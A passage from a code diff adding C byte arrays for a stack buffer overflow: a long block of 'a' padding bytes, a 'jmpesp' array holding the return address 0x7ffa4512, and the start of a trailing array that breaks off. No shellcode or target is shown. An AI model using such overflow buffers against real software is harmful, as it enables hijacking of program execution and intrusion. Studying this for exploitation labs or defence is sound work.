+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61
+};
+
+unsigned char jmpesp[] ={ //jmpesp=0x7ffa4512;
+	0x12, 0x45, 0xfa, 0x7f
+};
+
+unsigned char end[] = {
+	0x32, 0x33, 0x34, 0x35, 0x36, 
+	0x37, 0x38, 0x39, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x31, 0x32, 
